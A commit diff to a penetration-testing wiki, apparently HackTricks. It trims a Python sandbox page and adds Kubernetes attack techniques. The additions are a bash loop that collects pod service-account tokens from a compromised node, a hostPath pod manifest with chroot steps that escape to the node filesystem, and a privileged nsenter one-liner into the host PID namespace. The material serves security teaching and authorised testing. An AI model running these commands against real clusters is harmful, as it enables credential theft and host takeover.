GitBook: [#2911] No subject

2021-12-23 12:20:46 +00:00 · 2021-12-23 12:20:46 +00:00 · 8a0c6374c5
parent 086406e0d1
commit 8a0c6374c5
5 changed files with 98 additions and 36 deletions
--- a/misc/basic-python/bypass-python-sandboxes/README.md
+++ b/misc/basic-python/bypass-python-sandboxes/README.md
@ -830,31 +830,7 @@ f(42)

 ## Decompiling Compiled Python

-Using tools like [**https://www.decompiler.com/**](https://www.decompiler.com) **** one can **decompile** given compiled python code.
-
-**Check out this tutorial**:
-
-{% content-ref url="../../../forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md" %}
-[.pyc.md](../../../forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md)
-{% endcontent-ref %}
-
-## Misc Python
-
-### Assert
-
-Python executed with optimizations with the param `-O` will remove asset statements and any code conditional on the value of **debug**.\
-Therefore, checks like
-
-```python
-def check_permission(super_user):
-    try:
-        assert(super_user)
-        print("\nYou are a super user\n")
-    except AssertionError:
-        print(f"\nNot a Super User!!!\n")
-```
-
-will be bypassed&#x20;
+Using tools like [**https://www.decompiler.com/**](https://www.decompiler.com) **** one can **decompile** given compiled python code

 ## References

@ -863,4 +839,3 @@ will be bypassed&#x20;
 * [https://blog.delroth.net/2013/03/escaping-a-python-sandbox-ndh-2013-quals-writeup/](https://blog.delroth.net/2013/03/escaping-a-python-sandbox-ndh-2013-quals-writeup/)
 * [https://gynvael.coldwind.pl/n/python\_sandbox\_escape](https://gynvael.coldwind.pl/n/python\_sandbox\_escape)
 * [https://nedbatchelder.com/blog/201206/eval\_really\_is\_dangerous.html](https://nedbatchelder.com/blog/201206/eval\_really\_is\_dangerous.html)
-* [https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6](https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6)
--- a/pentesting/pentesting-kubernetes/README.md
+++ b/pentesting/pentesting-kubernetes/README.md
@ -48,3 +48,7 @@ Another important details about enumeration and Kubernetes permissions abuse is
 [hardening-roles-clusterroles.md](hardening-roles-clusterroles.md)
 {% endcontent-ref %}

+## Labs to practice and learn
+
+* [https://securekubernetes.com/](https://securekubernetes.com)
+* [https://madhuakula.com/kubernetes-goat/index.html](https://madhuakula.com/kubernetes-goat/index.html)
--- a/pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md
+++ b/pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md
@ -20,14 +20,6 @@ You can check this **docker breakouts to try to escape** from a pod you have com
 [docker-breakout](../../linux-unix/privilege-escalation/docker-breakout/)
 {% endcontent-ref %}

-If you managed to escape from the container there are some interesting things you will find in the node:
-
-* The **Kubelet** service listening
-* The **Kube-Proxy** service listening
-* The **Container Runtime** process (Docker)
-* More **pods/containers** running in the node you can abuse like this one (more tokens)
-* The whole **filesystem** and **OS** in general
-
 ### Abusing Kubernetes Privileges

 As explained in the section about **kubernetes enumeration**:
@ -94,3 +86,34 @@ In case the **compromised pod is running some sensitive service** where other po
 ## Automatic Tools

 * [https://github.com/inguardians/peirates](https://github.com/inguardians/peirates)
+
+## Node Post-Exploitation
+
+If you managed to **escape from the container** there are some interesting things you will find in the node:
+
+* The **Container Runtime** process (Docker)
+* More **pods/containers** running in the node you can abuse like this one (more tokens)
+* The whole **filesystem** and **OS** in general
+* The **Kube-Proxy** service listening
+* The **Kubelet** service listening: Check `/var/lib/kubelet/` specially `/var/lib/kubelet/kubeconfig`
+
+```bash
+# Check Kubelet privileges
+kubectl --kubeconfig /var/lib/kubelet/kubeconfig auth can-i create pod -n kube-system
+
+# Steal the tokens from the pods running in the node
+## The most interesting one is probably the one of kube-system
+ALREADY="IinItialVaaluE"
+for i in $(mount | sed -n '/secret/ s/^tmpfs on \(.*default.*\) type tmpfs.*$/\1\/namespace/p'); do
+    TOKEN=$(cat $(echo $i | sed 's/.namespace$/\/token/'))
+    if ! [ $(echo $TOKEN | grep -E $ALREADY) ]; then
+        ALREADY="$ALREADY|$TOKEN"
+        echo "Directory: $i"
+        echo "Namespace: $(cat $i)"
+        echo ""
+        echo $TOKEN
+        echo "================================================================================"
+        echo ""
+    fi
+done
+```
--- a/pentesting/pentesting-kubernetes/enumeration-from-a-pod.md
+++ b/pentesting/pentesting-kubernetes/enumeration-from-a-pod.md
@ -377,7 +377,15 @@ https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT_HTTPS/apis/batch/v1bet
 {% endtab %}
 {% endtabs %}

-****
+### **Get Pods consumptions**
+
+{% tabs %}
+{% tab title="kubectl" %}
+```
+./kubectl top pod --all-namespaces
+```
+{% endtab %}
+{% endtabs %}

 ### Escaping from the pod

--- a/pentesting/pentesting-kubernetes/hardening-roles-clusterroles.md
+++ b/pentesting/pentesting-kubernetes/hardening-roles-clusterroles.md
@ -91,7 +91,7 @@ So just create the malicious pod and expect the secrets in port 6666:

 ![](<../../.gitbook/assets/image (464).png>)

-### **Pod Creation - Mount Root (pod escape)**
+### **Pod Creation & Escape - Mount Root**

 Having Pod create permissions over kube-system you can also be able to mount directories from the node hosting the pods with a pod template like the following one:

@ -125,6 +125,58 @@ kubectl --token $token create -f mount_root.yaml

 And capturing the reverse shell you can find the `/` directory (the entire filesystem) of the node mounted in `/mnt` inside the pod.

+**Instead of getting a reverse shell you might just wanto to execute a pod using kubectl with the filesystem mounted and get a shell on it:**
+
+1.  Create a "hostpath volume mount" `pod` manifest.
+
+    ```
+    cat > hostpath.yml <<EOF
+    ---
+    apiVersion: v1
+    kind: Pod
+    metadata:
+      name: hostpath
+    spec:
+      containers:
+      - name: hostpath
+        image: busybox:latest
+        command:
+          - sleep
+          - "86400"
+        volumeMounts:
+          - name: rootfs
+            mountPath: /rootfs
+      restartPolicy: Always
+      volumes:
+        - name: rootfs
+          hostPath:
+            path: /
+    EOF
+    ```
+2.  Create the `pod` that mounts the host filesystem's `/` at `/rootfs` inside the container.
+
+    ```
+    kubectl apply -f hostpath.yml
+    ```
+3.  Use `kubectl exec` to get a shell inside the `hostpath` `pod` in the `default` `namespace`.
+
+    ```
+    kubectl exec -it hostpath /bin/sh
+    ```
+4.  Use the `chroot` command to switch the filesystem root to the `/rootfs` of the container and run a `bash` shell.
+
+    ```
+    chroot /rootfs /bin/bash
+    ```
+
+### Pod Creation & Escape -  Get into root pid ns
+
+From [this tweet](https://twitter.com/mauilion/status/1129468485480751104) you can find a way to escape from the pod and get inside the root ns
+
+```bash
+kubectl run r00t --restart=Never -ti --rm --image lol --overrides '{"spec":{"hostPID": true, "containers":[{"name":"1","image":"alpine","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin": true,"tty":true,"imagePullPolicy":"IfNotPresent","securityContext":{"privileged":true}}]}}'
+```
+
 ### Sniffing **with a sidecar proxy app**

 By default there isn't any encryption in the communication between pods .Mutual authentication, two-way, pod to pod.